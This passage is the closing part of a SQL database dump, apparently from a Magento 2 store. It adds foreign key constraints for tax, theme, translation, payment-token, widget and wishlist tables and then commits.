  ADD CONSTRAINT `TAX_CALC_TAX_CALC_RATE_ID_TAX_CALC_RATE_TAX_CALC_RATE_ID` FOREIGN KEY (`tax_calculation_rate_id`) REFERENCES `tax_calculation_rate` (`tax_calculation_rate_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `TAX_CALC_TAX_CALC_RULE_ID_TAX_CALC_RULE_TAX_CALC_RULE_ID` FOREIGN KEY (`tax_calculation_rule_id`) REFERENCES `tax_calculation_rule` (`tax_calculation_rule_id`) ON DELETE CASCADE;

--
-- Constraints for table `tax_calculation_rate_title`
--
ALTER TABLE `tax_calculation_rate_title`
  ADD CONSTRAINT `FK_37FB965F786AD5897BB3AE90470C42AB` FOREIGN KEY (`tax_calculation_rate_id`) REFERENCES `tax_calculation_rate` (`tax_calculation_rate_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `TAX_CALCULATION_RATE_TITLE_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `tax_order_aggregated_created`
--
ALTER TABLE `tax_order_aggregated_created`
  ADD CONSTRAINT `TAX_ORDER_AGGREGATED_CREATED_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `tax_order_aggregated_updated`
--
ALTER TABLE `tax_order_aggregated_updated`
  ADD CONSTRAINT `TAX_ORDER_AGGREGATED_UPDATED_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `theme_file`
--
ALTER TABLE `theme_file`
  ADD CONSTRAINT `THEME_FILE_THEME_ID_THEME_THEME_ID` FOREIGN KEY (`theme_id`) REFERENCES `theme` (`theme_id`) ON DELETE CASCADE;

--
-- Constraints for table `translation`
--
ALTER TABLE `translation`
  ADD CONSTRAINT `TRANSLATION_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `ui_bookmark`
--
ALTER TABLE `ui_bookmark`
  ADD CONSTRAINT `UI_BOOKMARK_USER_ID_ADMIN_USER_USER_ID` FOREIGN KEY (`user_id`) REFERENCES `admin_user` (`user_id`) ON DELETE CASCADE;

--
-- Constraints for table `variable_value`
--
ALTER TABLE `variable_value`
  ADD CONSTRAINT `VARIABLE_VALUE_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `VARIABLE_VALUE_VARIABLE_ID_VARIABLE_VARIABLE_ID` FOREIGN KEY (`variable_id`) REFERENCES `variable` (`variable_id`) ON DELETE CASCADE;

--
-- Constraints for table `vault_payment_token`
--
ALTER TABLE `vault_payment_token`
  ADD CONSTRAINT `VAULT_PAYMENT_TOKEN_CUSTOMER_ID_CUSTOMER_ENTITY_ENTITY_ID` FOREIGN KEY (`customer_id`) REFERENCES `customer_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `vault_payment_token_order_payment_link`
--
ALTER TABLE `vault_payment_token_order_payment_link`
  ADD CONSTRAINT `FK_4ED894655446D385894580BECA993862` FOREIGN KEY (`payment_token_id`) REFERENCES `vault_payment_token` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `FK_CF37B9D854256534BE23C818F6291CA2` FOREIGN KEY (`order_payment_id`) REFERENCES `sales_order_payment` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `weee_tax`
--
ALTER TABLE `weee_tax`
  ADD CONSTRAINT `WEEE_TAX_ATTRIBUTE_ID_EAV_ATTRIBUTE_ATTRIBUTE_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `WEEE_TAX_COUNTRY_DIRECTORY_COUNTRY_COUNTRY_ID` FOREIGN KEY (`country`) REFERENCES `directory_country` (`country_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `WEEE_TAX_ENTITY_ID_CATALOG_PRODUCT_ENTITY_ENTITY_ID` FOREIGN KEY (`entity_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `WEEE_TAX_WEBSITE_ID_STORE_WEBSITE_WEBSITE_ID` FOREIGN KEY (`website_id`) REFERENCES `store_website` (`website_id`) ON DELETE CASCADE;

--
-- Constraints for table `widget_instance`
--
ALTER TABLE `widget_instance`
  ADD CONSTRAINT `WIDGET_INSTANCE_THEME_ID_THEME_THEME_ID` FOREIGN KEY (`theme_id`) REFERENCES `theme` (`theme_id`) ON DELETE CASCADE;

--
-- Constraints for table `widget_instance_page`
--
ALTER TABLE `widget_instance_page`
  ADD CONSTRAINT `WIDGET_INSTANCE_PAGE_INSTANCE_ID_WIDGET_INSTANCE_INSTANCE_ID` FOREIGN KEY (`instance_id`) REFERENCES `widget_instance` (`instance_id`) ON DELETE CASCADE;

--
-- Constraints for table `widget_instance_page_layout`
--
ALTER TABLE `widget_instance_page_layout`
  ADD CONSTRAINT `WIDGET_INSTANCE_PAGE_LAYOUT_PAGE_ID_WIDGET_INSTANCE_PAGE_PAGE_ID` FOREIGN KEY (`page_id`) REFERENCES `widget_instance_page` (`page_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `WIDGET_INSTANCE_PAGE_LYT_LYT_UPDATE_ID_LYT_UPDATE_LYT_UPDATE_ID` FOREIGN KEY (`layout_update_id`) REFERENCES `layout_update` (`layout_update_id`) ON DELETE CASCADE;

--
-- Constraints for table `wishlist`
--
ALTER TABLE `wishlist`
  ADD CONSTRAINT `WISHLIST_CUSTOMER_ID_CUSTOMER_ENTITY_ENTITY_ID` FOREIGN KEY (`customer_id`) REFERENCES `customer_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `wishlist_item`
--
ALTER TABLE `wishlist_item`
  ADD CONSTRAINT `WISHLIST_ITEM_PRODUCT_ID_CATALOG_PRODUCT_ENTITY_ENTITY_ID` FOREIGN KEY (`product_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `WISHLIST_ITEM_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE SET NULL,
  ADD CONSTRAINT `WISHLIST_ITEM_WISHLIST_ID_WISHLIST_WISHLIST_ID` FOREIGN KEY (`wishlist_id`) REFERENCES `wishlist` (`wishlist_id`) ON DELETE CASCADE;

--
-- Constraints for table `wishlist_item_option`
--
ALTER TABLE `wishlist_item_option`
  ADD CONSTRAINT `FK_A014B30B04B72DD0EAB3EECD779728D6` FOREIGN KEY (`wishlist_item_id`) REFERENCES `wishlist_item` (`wishlist_item_id`) ON DELETE CASCADE;
COMMIT;

/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
